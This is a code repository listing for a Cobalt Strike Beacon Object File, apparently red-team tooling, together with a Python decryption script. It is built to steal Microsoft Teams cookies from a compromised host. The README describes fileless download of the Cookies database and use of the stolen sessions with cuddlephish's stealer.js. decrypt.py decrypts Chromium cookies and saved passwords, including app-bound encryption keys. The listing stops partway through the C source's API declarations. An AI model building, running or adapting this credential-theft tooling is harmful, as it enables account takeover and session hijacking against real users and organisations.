├── .gitignore ├── requirements.txt ├── Makefile ├── teams-cookies-bof.h ├── README.md ├── beacon.h ├── decrypt.py ├── teams-cookies-bof.c └── LICENSE /.gitignore: -------------------------------------------------------------------------------- 1 | *.db 2 | *.exe 3 | *.o 4 | *.json 5 | .DS_Store 6 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pycryptodome==3.23.0 2 | pyasn1_modules==0.4.2 3 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | x86_64-w64-mingw32-gcc -c teams-cookies-bof.c -o teams-cookies-bof.x64.o 3 | x86_64-w64-mingw32-strip --strip-unneeded teams-cookies-bof.x64.o 4 | i686-w64-mingw32-gcc -c teams-cookies-bof.c -o teams-cookies-bof.x86.o 5 | x64: 6 | x86_64-w64-mingw32-gcc -c teams-cookies-bof.c -o teams-cookies-bof.x64.o 7 | x86_64-w64-mingw32-strip --strip-unneeded teams-cookies-bof.x64.o 8 | clean: 9 | rm teams-cookies-bof.x64.o 10 | rm teams-cookies-bof.x86.o 11 | -------------------------------------------------------------------------------- /teams-cookies-bof.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define SystemHandleInformation 0x10 4 | #define STATUS_INFO_LENGTH_MISMATCH 0xc0000004 5 | 6 | //nanodump fileless download 7 | #define CALLBACK_FILE 0x02 8 | #define CALLBACK_FILE_WRITE 0x08 9 | #define CALLBACK_FILE_CLOSE 0x09 10 | // chunk size used in download_file: 900 KiB 11 | #define CHUNK_SIZE 0xe1000 12 | 13 | typedef struct _SYSTEM_HANDLE 14 | { 15 | ULONG ProcessId; 16 | UCHAR ObjectTypeNumber; 17 | UCHAR Flags; 18 | USHORT Handle; 19 | PVOID Object; 20 | ACCESS_MASK GrantedAccess; 21 | } SYSTEM_HANDLE, SYSTEM_HANDLE_INFORMATION_, * PSYSTEM_HANDLE_INFORMATION_; 22 | 23 | typedef struct _SYSTEM_HANDLE_INFORMATION { 24 | ULONG NumberOfHandles; 25 | SYSTEM_HANDLE Handles[1]; 26 | } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; 27 | 28 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { 29 | PVOID Object; 30 | HANDLE UniqueProcessId; 31 | HANDLE HandleValue; 32 | ULONG GrantedAccess; 33 | USHORT CreatorBackTraceIndex; 34 | USHORT ObjectTypeIndex; 35 | ULONG HandleAttributes; 36 | ULONG Reserved; 37 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; 38 | 39 | typedef struct _SYSTEM_HANDLE_INFORMATION_EX { 40 | ULONG_PTR NumberOfHandles; 41 | ULONG_PTR Reserved; 42 | SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; 43 | } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX; 44 | 45 | typedef struct _UNICODE_STRING { 46 | USHORT Length; 47 | USHORT MaximumLength; 48 | PWSTR Buffer; 49 | } UNICODE_STRING, *PUNICODE_STRING; 50 | 51 | typedef struct __PUBLIC_OBJECT_TYPE_INFORMATION 52 | { 53 | UNICODE_STRING TypeName; 54 | ULONG Reserved [22]; // reserved for internal use 55 | } PUBLIC_OBJECT_TYPE_INFORMATION, *PPUBLIC_OBJECT_TYPE_INFORMATION; 56 | 57 | typedef enum _SYSTEM_INFORMATION_CLASS { 58 | SystemBasicInformation, 59 | SystemHandleInformationEx = 64 // This may differ based on Windows version 60 | } SYSTEM_INFORMATION_CLASS; 61 | 62 | typedef enum _OBJECT_INFORMATION_CLASS 63 | { 64 | ObjectBasicInformation, 65 | ObjectNameInformation, 66 | ObjectTypeInformation, 67 | ObjectAllInformation, 68 | ObjectDataInformation 69 | } OBJECT_INFORMATION_CLASS, *POBJECT_INFORMATION_CLASS; 70 | 71 | typedef struct _OBJECT_NAME_INFORMATION 72 | { 73 | UNICODE_STRING Name; 74 | } OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; 75 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # teams-cookies-bof 2 | Steal cookies for Teams, while running within the `ms-teams.exe` process. Related post: [https://tierzerosecurity.co.nz/2025/11/03/teams-cookies-bof.html](https://tierzerosecurity.co.nz/2025/11/03/teams-cookies-bof.html) 3 | 4 | Based on: [https://blog.randorisec.fr/ms-teams-access-tokens/](https://blog.randorisec.fr/ms-teams-access-tokens/). 5 | 6 | This tool is heavily based on the [Cookie-Monster-BOF](https://github.com/KingOfTheNOPs/cookie-monster). 7 | 8 | The BOF will extract the Encryption Key, locate the `msedgewebview2.exe` processes with a handle to the Cookies file, copy the handle and then filelessly download the target file. 9 | 10 | Once the Cookies are downloaded, the Python decryption script (see below) can be used to extract those secrets. 11 | 12 | ## BOF Usage 13 | 14 | The BOF is supposed to be run within the `ms-teams.exe` Teams process. The BOF takes no arguments. 15 | 16 | teams-bof 17 | 18 | ## Compile BOF 19 | Ensure Mingw-w64 and make is installed on the Linux prior to compiling. 20 | ``` 21 | make 22 | ``` 23 | 24 | ## Decryption Steps 25 | Install requirements 26 | ``` 27 | pip3 install -r requirements.txt 28 | ``` 29 | 30 | Usage 31 | ``` 32 | python3 decrypt.py -h 33 | usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY] 34 | 35 | Decrypt Chromium cookies and passwords given a key and DB file 36 | 37 | options: 38 | -h, --help show this help message and exit 39 | -k KEY, --key KEY Decryption key 40 | -o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox} 41 | Option to choose 42 | -f FILE, --file FILE Location of the database file 43 | --chrome-aes-key CHROME_AES_KEY 44 | Chrome AES Key 45 | ``` 46 | 47 | Examples: 48 | Decrypt Chrome/Edge Cookies File 49 | ``` 50 | python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db 51 | 52 | Results Example: 53 | ----------------------------------- 54 | Host: .github.com 55 | Path: / 56 | Name: dotcom_user 57 | Cookie: KingOfTheNOPs 58 | Expires: Oct 28 2024 21:25:22 59 | 60 | Host: github.com 61 | Path: / 62 | Name: user_session 63 | Cookie: x123..... 64 | Expires: Nov 11 2023 21:25:22 65 | ``` 66 | Decrypt Chrome Cookies with Chrome AES Key 67 | ``` 68 | python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db 69 | Cookies saved to cuddlephish_2025-07-03_01-53-57.json 70 | ``` 71 | Decrypt Chrome/Edge Cookies File and save to json 72 | ``` 73 | python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db 74 | Results Example: 75 | Cookies saved to 2025-04-11_18-06-10_cookies.json 76 | ``` 77 | Import cookies JSON file with https://cookie-editor.com/ 78 | 79 | Decrypt Chome/Edge Passwords File 80 | ``` 81 | python .\decrypt.py -k "\xec\xfc...." -o passwords ChromePasswords.db 82 | 83 | Results Example: 84 | ----------------------------------- 85 | URL: https://test.com/ 86 | Username: tester 87 | Password: McTesty 88 | ``` 89 | Decrypt Firefox Cookies and Stored Credentials:
90 | https://github.com/lclevy/firepwd 91 | 92 | ### CuddlePhish Support 93 | added cuddlephish option to the decrypt script which should support using the cookie with https://github.com/fkasler/cuddlephish 94 | 95 | ``` 96 | # Decrypt Cookies 97 | python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db 98 | 99 | # Clone Project 100 | cd 101 | git clone https://github.com/fkasler/cuddlephish 102 | cd cuddlephish 103 | 104 | # Install Dependencies Example on Debian 105 | curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh 106 | sudo -E bash nodesource_setup.sh 107 | sudo apt-get install nodejs 108 | npm install 109 | 110 | # Import Cookies 111 | cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json . 112 | node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json 113 | ``` 114 | 115 | ## References 116 | Stealing Microsoft Teams access tokens in 2025: 117 | https://blog.randorisec.fr/ms-teams-access-tokens/
118 | Cookie-Monster-BOF: 119 | https://github.com/KingOfTheNOPs/cookie-monster
120 | Cookie Webkit Master Key Extractor: 121 | https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
122 | Fileless download: 123 | https://github.com/fortra/nanodump
124 | -------------------------------------------------------------------------------- /beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | * 7/18/2023: Added BeaconInformation API for 4.9 14 | * 7/31/2023: Added Key/Value store APIs for 4.9 15 | * BeaconAddValue, BeaconGetValue, and BeaconRemoveValue 16 | * 8/31/2023: Added Data store APIs for 4.9 17 | * BeaconDataStoreGetItem, BeaconDataStoreProtectItem, 18 | * BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries 19 | * 9/01/2023: Added BeaconGetCustomUserData API for 4.9 20 | */ 21 | 22 | /* data API */ 23 | typedef struct { 24 | char * original; /* the original buffer [so we can free it] */ 25 | char * buffer; /* current pointer into our buffer */ 26 | int length; /* remaining length of data */ 27 | int size; /* total size of this buffer */ 28 | } datap; 29 | 30 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 31 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 32 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 33 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 34 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 35 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 36 | 37 | /* format API */ 38 | typedef struct { 39 | char * original; /* the original buffer [so we can free it] */ 40 | char * buffer; /* current pointer into our buffer */ 41 | int length; /* remaining length of data */ 42 | int size; /* total size of this buffer */ 43 | } formatp; 44 | 45 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 46 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 47 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 48 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 49 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 50 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 51 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 52 | 53 | /* Output Functions */ 54 | #define CALLBACK_OUTPUT 0x0 55 | #define CALLBACK_OUTPUT_OEM 0x1e 56 | #define CALLBACK_OUTPUT_UTF8 0x20 57 | #define CALLBACK_ERROR 0x0d 58 | 59 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 60 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 61 | 62 | 63 | /* Token Functions */ 64 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 65 | DECLSPEC_IMPORT void BeaconRevertToken(); 66 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 67 | 68 | /* Spawn+Inject Functions */ 69 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 70 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 71 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 72 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 73 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 74 | 75 | /* Utility Functions */ 76 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 77 | 78 | /* Beacon Information */ 79 | /* 80 | * ptr - pointer to the base address of the allocated memory. 81 | * size - the number of bytes allocated for the ptr. 82 | */ 83 | typedef struct { 84 | char * ptr; 85 | size_t size; 86 | } HEAP_RECORD; 87 | #define MASK_SIZE 13 88 | 89 | /* 90 | * sleep_mask_ptr - pointer to the sleep mask base address 91 | * sleep_mask_text_size - the sleep mask text section size 92 | * sleep_mask_total_size - the sleep mask total memory size 93 | * 94 | * beacon_ptr - pointer to beacon's base address 95 | * The stage.obfuscate flag affects this value when using CS default loader. 96 | * true: beacon_ptr = allocated_buffer - 0x1000 (Not a valid address) 97 | * false: beacon_ptr = allocated_buffer (A valid address) 98 | * For a UDRL the beacon_ptr will be set to the 1st argument to DllMain 99 | * when the 2nd argument is set to DLL_PROCESS_ATTACH. 100 | * sections - list of memory sections beacon wants to mask. These are offset values 101 | * from the beacon_ptr and the start value is aligned on 0x1000 boundary. 102 | * A section is denoted by a pair indicating the start and end offset values. 103 | * The list is terminated by the start and end offset values of 0 and 0. 104 | * heap_records - list of memory addresses on the heap beacon wants to mask. 105 | * The list is terminated by the HEAP_RECORD.ptr set to NULL. 106 | * mask - the mask that beacon randomly generated to apply 107 | */ 108 | typedef struct { 109 | char * sleep_mask_ptr; 110 | DWORD sleep_mask_text_size; 111 | DWORD sleep_mask_total_size; 112 | 113 | char * beacon_ptr; 114 | DWORD * sections; 115 | HEAP_RECORD * heap_records; 116 | char mask[MASK_SIZE]; 117 | } BEACON_INFO; 118 | 119 | DECLSPEC_IMPORT void BeaconInformation(BEACON_INFO * info); 120 | 121 | /* Key/Value store functions 122 | * These functions are used to associate a key to a memory address and save 123 | * that information into beacon. These memory addresses can then be 124 | * retrieved in a subsequent execution of a BOF. 125 | * 126 | * key - the key will be converted to a hash which is used to locate the 127 | * memory address. 128 | * 129 | * ptr - a memory address to save. 130 | * 131 | * Considerations: 132 | * - The contents at the memory address is not masked by beacon. 133 | * - The contents at the memory address is not released by beacon. 134 | * 135 | */ 136 | DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr); 137 | DECLSPEC_IMPORT void * BeaconGetValue(const char * key); 138 | DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key); 139 | 140 | /* Beacon Data Store functions 141 | * These functions are used to access items in Beacon's Data Store. 142 | * BeaconDataStoreGetItem returns NULL if the index does not exist. 143 | * 144 | * The contents are masked by default, and BOFs must unprotect the entry 145 | * before accessing the data buffer. BOFs must also protect the entry 146 | * after the data is not used anymore. 147 | * 148 | */ 149 | 150 | #define DATA_STORE_TYPE_EMPTY 0 151 | #define DATA_STORE_TYPE_GENERAL_FILE 1 152 | 153 | typedef struct { 154 | int type; 155 | DWORD64 hash; 156 | BOOL masked; 157 | char* buffer; 158 | size_t length; 159 | } DATA_STORE_OBJECT, *PDATA_STORE_OBJECT; 160 | 161 | DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index); 162 | DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index); 163 | DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index); 164 | DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries(); 165 | 166 | /* Beacon User Data functions */ 167 | DECLSPEC_IMPORT char * BeaconGetCustomUserData(); -------------------------------------------------------------------------------- /decrypt.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import base64 3 | import sqlite3 4 | import os 5 | import argparse 6 | from Crypto.Cipher import AES, ChaCha20_Poly1305 7 | import binascii 8 | import json 9 | from datetime import datetime, timedelta 10 | from pyasn1.codec.der import decoder 11 | 12 | def cookies(key, file_location): 13 | if os.path.isfile(file_location) == False: 14 | print("Error: File does not exist") 15 | sys.exit(1) 16 | try: 17 | conn = sqlite3.connect(file_location) 18 | cursor = conn.cursor() 19 | cursor.execute('select host_key, "TRUE", path, "FALSE", expires_utc, has_expires, name, CAST(encrypted_value AS BLOB) from cookies') 20 | values = cursor.fetchall() 21 | for host_key, _, path, _, expires_utc, has_expires, name, encrypted_value in values: 22 | print("Host: " + host_key) 23 | print("Path: " + path) 24 | print("Name: " + name) 25 | print("Cookie: " + decrypt_data(encrypted_value,key, False) + ";") 26 | print("Expires: " + (datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).strftime('%b %d %Y %H:%M:%S')) if has_expires else -1 27 | print("") 28 | except sqlite3.Error as e: 29 | print("Error: Could not connect to database") 30 | print(e) 31 | sys.exit(1) 32 | 33 | def cookies_for_editor(key, file_location): 34 | cookies = [] 35 | if os.path.isfile(file_location) == False: 36 | print("Error: File does not exist") 37 | sys.exit(1) 38 | try: 39 | conn = sqlite3.connect(file_location) 40 | cursor = conn.cursor() 41 | cursor.execute('select host_key, "TRUE", path, "FALSE", expires_utc, has_expires, name, CAST(encrypted_value AS BLOB) from cookies') 42 | values = cursor.fetchall() 43 | for host_key, _, path, _, expires_utc, has_expires, name, encrypted_value in values: 44 | decrypted_value = decrypt_data(encrypted_value, key, False) 45 | expiration_date = (datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).timestamp() if has_expires else -1 46 | cookie = { 47 | "domain": host_key, 48 | "expirationDate": expiration_date, 49 | "hostOnly": not host_key.startswith('.'), 50 | "httpOnly": False, 51 | "name": name, 52 | "path": path, 53 | "sameSite": None, 54 | "secure": False, 55 | "session": False, 56 | "storeId": None, 57 | "value": decrypted_value 58 | } 59 | cookies.append(cookie) 60 | cookie_file_name = datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + "_cookies.json" 61 | with open(cookie_file_name, 'w') as f: 62 | json.dump(cookies, f, indent=4) 63 | print("Cookies saved to " + cookie_file_name) 64 | except sqlite3.Error as e: 65 | print("Error: Could not connect to database") 66 | print(e) 67 | sys.exit(1) 68 | 69 | def login_data(key, file_location): 70 | if os.path.isfile(file_location) == False: 71 | print("Error: File does not exist") 72 | sys.exit(1) 73 | try: 74 | conn = sqlite3.connect(file_location) 75 | cursor = conn.cursor() 76 | cursor.execute("SELECT origin_url, username_value, password_value FROM logins") 77 | values = cursor.fetchall() 78 | for origin_url, username_value, password_value in values: 79 | print("URL: " + origin_url) 80 | print("Username: " + username_value) 81 | print("Password: " + decrypt_data(password_value, key, True)) 82 | print("") 83 | except sqlite3.Error as e: 84 | print("Error: Could not connect to database") 85 | print(e) 86 | sys.exit(1) 87 | 88 | def cookies_for_cuddlephish(key, file_location): 89 | cookies = [] 90 | if os.path.isfile(file_location) == False: 91 | print("Error: File does not exist") 92 | sys.exit(1) 93 | try: 94 | priority_map = {1: "Medium", 2: "High"} 95 | conn = sqlite3.connect(file_location) 96 | cursor = conn.cursor() 97 | cursor.execute('select creation_utc, host_key, top_frame_site_key, name, CAST(encrypted_value AS BLOB), path, expires_utc, is_secure, is_httponly, last_access_utc, has_expires, is_persistent, priority, samesite, source_scheme, source_port, last_update_utc, source_type, has_cross_site_ancestor from cookies') 98 | values = cursor.fetchall() 99 | 100 | for creation_utc, host_key, top_frame_site_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly, last_access_utc, has_expires, is_persistent, priority, samesite, source_scheme, source_port, last_update_utc, source_type, has_cross_site_ancestor in values: 101 | decrypted_value = decrypt_data(encrypted_value, key) 102 | expiration_date = (datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).timestamp() if has_expires else -1 103 | 104 | samesite_map = {0: "None", 1: "Lax", 2: "Strict"} 105 | 106 | source_scheme_map = {0: "NonSecure", 1: "Secure"} 107 | 108 | cookie = { 109 | 'domain': host_key, 110 | 'expires': expiration_date, 111 | 'httpOnly': bool(is_httponly), 112 | 'name': name, 113 | 'path': path, 114 | 'priority': priority_map.get(priority, "Medium"), 115 | 'sameParty': False, 116 | 'sameSite': samesite_map.get(samesite, "None"), 117 | 'secure': bool(is_secure), 118 | 'session': not bool(is_persistent), 119 | 'size': len(name) + len(decrypted_value), 120 | 'sourcePort': source_port, 121 | 'value': decrypted_value 122 | } 123 | cookies.append(cookie) 124 | 125 | output = { 126 | "url": "about:blank", 127 | "cookies": cookies, 128 | "local_storage": [] 129 | } 130 | cookie_file_name = "cuddlephish_" +datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".json" 131 | with open(cookie_file_name, 'w') as f: 132 | json.dump(output, f, indent=4) 133 | print("Cookies saved to " + cookie_file_name) 134 | except sqlite3.Error as e: 135 | print("Error: Could not connect to database") 136 | print(e) 137 | sys.exit(1) 138 | 139 | def decrypt_data(encrypted_junk, key, password=False): 140 | #key = binascii.unhexlify(key) 141 | version = encrypted_junk[:3] 142 | if version in (b'v10', b'v11'): 143 | try: 144 | nonce = encrypted_junk[3:3 + 12] 145 | if len(nonce) == 0: 146 | print("Error: Nonce cannot be empty") 147 | return "" 148 | cipher_text = encrypted_junk[3+12:-16] 149 | tag = encrypted_junk[-16:] 150 | plain_text = AES.new(key, AES.MODE_GCM, nonce) 151 | text = plain_text.decrypt(cipher_text) 152 | return text[32:].decode('utf-8') 153 | except Exception as e: 154 | print("Error: Could not decrypt password") 155 | print(e) 156 | return "" 157 | if version in (b'v20'): 158 | try: 159 | nonce = encrypted_junk[3:3 + 12] 160 | if len(nonce) == 0: 161 | print("Error: Nonce cannot be empty") 162 | return "" 163 | cipher_text = encrypted_junk[3+12:-16] 164 | tag = encrypted_junk[-16:] 165 | plain_text = AES.new(key, AES.MODE_GCM, nonce) 166 | text = plain_text.decrypt(cipher_text) 167 | if password: 168 | return text.decode('utf-8') 169 | else: 170 | return text[32:].decode('utf-8') 171 | except Exception as e: 172 | print("Error: Could not decrypt password") 173 | print(e) 174 | return "" 175 | 176 | def byte_xor(ba1, ba2): 177 | return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)]) 178 | 179 | def argparse_args(): 180 | parser = argparse.ArgumentParser(description='Decrypt Chromium cookies and passwords given a key and DB file') 181 | parser.add_argument('-k', '--key', help='Decryption key', required=True) 182 | parser.add_argument('-o','--option', choices=['cookies', 'passwords', 'cookie-editor', 'cuddlephish', 'firefox'], help='Option to choose', required=True) 183 | parser.add_argument('-f','--file', help='Location of the database file', required=True) 184 | parser.add_argument('--chrome-aes-key',help='Chrome AES Key',required=False) 185 | return parser.parse_args() 186 | 187 | def main(): 188 | args = argparse_args() 189 | key = args.key 190 | base64_key = base64.b64encode(key.encode()) 191 | option = args.option 192 | file_location = args.file 193 | chromeAES = args.chrome_aes_key 194 | if chromeAES: 195 | base64ChromeKey = base64.b64encode(chromeAES.encode()) 196 | 197 | key = bytearray(base64.b64decode(base64_key).decode('utf-8').replace('\\x', ''), 'utf-8') 198 | # if key len is not 32, then its chrome 127+ 199 | # https://github.com/runassu/chrome_v20_decryption/issues/14#issuecomment-2708796234 200 | key = binascii.unhexlify(key) 201 | 202 | if (chromeAES): 203 | chromeKey = bytearray(base64.b64decode(base64ChromeKey).decode('utf-8').replace('\\x', ''), 'utf-8') 204 | chromeKey = binascii.unhexlify(chromeKey) 205 | 206 | xor_key = bytes.fromhex("CCF8A1CEC56605B8517552BA1A2D061C03A29E90274FB2FCF59BA4B75C392390") 207 | xored_aes_key = byte_xor(chromeKey, xor_key) 208 | 209 | 210 | #print(len(key)) 211 | if len(key) > 32: 212 | aes_key = binascii.a2b_base64("sxxuJBrIRnKNqcH6xJNmUc/7lE0UOrgWJ2vMbaAoR4c=") 213 | chacha20_key = bytes.fromhex("E98F37D7F4E1FA433D19304DC2258042090E2D1D7EEA7670D41F738D08729660") 214 | flag = key[0] 215 | iv = key[1:1+12] 216 | ciphertext = key[1+12:1+12+32] 217 | tag = key[1+12+32:] 218 | 219 | #check for flag to determine if AES or ChaCha. Changed in chrome 130+ 220 | if flag == 1: 221 | cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv) 222 | elif flag == 2: 223 | cipher = ChaCha20_Poly1305.new(key=chacha20_key, nonce=iv) 224 | elif flag == 3: 225 | iv = key[1+32:1+32+12] 226 | ciphertext = key[1+32+12:1+32+12+32] 227 | tag = key[1+32+12+32:1+32+12+32+16] 228 | cipher = AES.new(xored_aes_key, AES.MODE_GCM, nonce=iv) 229 | else: 230 | raise ValueError(f"Unsupported flag: {flag}") 231 | key = cipher.decrypt_and_verify(ciphertext, tag) 232 | print("Decrypted App Bound Key: " + ''.join(f'\\x{b:02X}' for b in key) + "\n") 233 | 234 | if option == "cookies": 235 | cookies(key, file_location) 236 | elif option == "passwords": 237 | login_data(key, file_location) 238 | elif option == "cookie-editor": 239 | cookies_for_editor(key, file_location) 240 | elif option == "cuddlephish": 241 | cookies_for_cuddlephish(key, file_location) 242 | elif option == "firefox": 243 | print("TO DO") 244 | else: 245 | print("Error: Invalid option") 246 | sys.exit(1) 247 | 248 | if __name__ == "__main__": 249 | main() 250 | -------------------------------------------------------------------------------- /teams-cookies-bof.c: -------------------------------------------------------------------------------- 1 | // Based on research: https://blog.randorisec.fr/ms-teams-access-tokens/ 2 | // Heavily based on cookie-monster BOF: https://github.com/KingOfTheNOPs/cookie-monster 3 | // Code based on mr.un1k0d3r's seasonal videos and his cookie-grabber POC 4 | // https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF/blob/main/cookie-graber.c 5 | // fileless download based on nanodump methods 6 | // https://github.com/fortra/nanodump 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include "teams-cookies-bof.h" 13 | #include "beacon.h" 14 | 15 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID); 16 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 17 | WINBASEAPI DWORD WINAPI KERNEL32$GetFileSize (HANDLE hFile, LPDWORD lpFileSizeHigh); 18 | WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalAlloc (UINT uFlags, SIZE_T dwBytes); 19 | WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalReAlloc (HGLOBAL hMem, SIZE_T dwBytes, UINT uFlags); 20 | WINBASEAPI BOOL WINAPI KERNEL32$ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); 21 | WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject); 22 | WINBASEAPI char* __cdecl MSVCRT$strstr (char* _String, const char* _SubString); 23 | WINBASEAPI size_t __cdecl MSVCRT$strlen (const char *s); 24 | DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strchr(const char *haystack, int needle); 25 | WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...); 26 | WINBASEAPI HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL hMem); 27 | WINBASEAPI char* __cdecl MSVCRT$strncpy (char * __dst, const char * __src, size_t __n); 28 | WINBASEAPI char* __cdecl MSVCRT$strncat (char * _Dest,const char * _Source, size_t __n); 29 | WINBASEAPI void * WINAPI MSVCRT$memcpy (void *dest, const void *src, size_t count); 30 | DECLSPEC_IMPORT int WINAPI MSVCRT$strcmp(const char*, const char*); 31 | WINBASEAPI BOOL WINAPI CRYPT32$CryptUnprotectData (DATA_BLOB *pDataIn, LPWSTR *ppszDataDescr, DATA_BLOB *pOptionalEntropy, PVOID pvReserved, CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct, DWORD dwFlags, DATA_BLOB *pDataOut); 32 | WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree (HGLOBAL hMem); 33 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID); 34 | WINBASEAPI BOOL WINAPI KERNEL32$Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe); 35 | WINBASEAPI BOOL WINAPI KERNEL32$Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe); 36 | WINBASEAPI DWORD WINAPI KERNEL32$GetFileType(HANDLE hFile); 37 | WINBASEAPI BOOL WINAPI KERNEL32$DuplicateHandle (HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwOptions); 38 | WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); 39 | WINBASEAPI BOOL WINAPI CRYPT32$CryptStringToBinaryA (LPCSTR pszString, DWORD cchString, DWORD dwFlags, BYTE *pbBinary, DWORD *pcbBinary, DWORD *pdwSkip, DWORD *pdwFlags); 40 | WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress (HMODULE hModule, LPCSTR lpProcName); 41 | WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA (LPCSTR lpLibFileName); 42 | WINBASEAPI DWORD WINAPI KERNEL32$SetFilePointer (HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); 43 | DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$NtQuerySystemInformation(int SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength); 44 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 45 | WINBASEAPI BOOL WINAPI 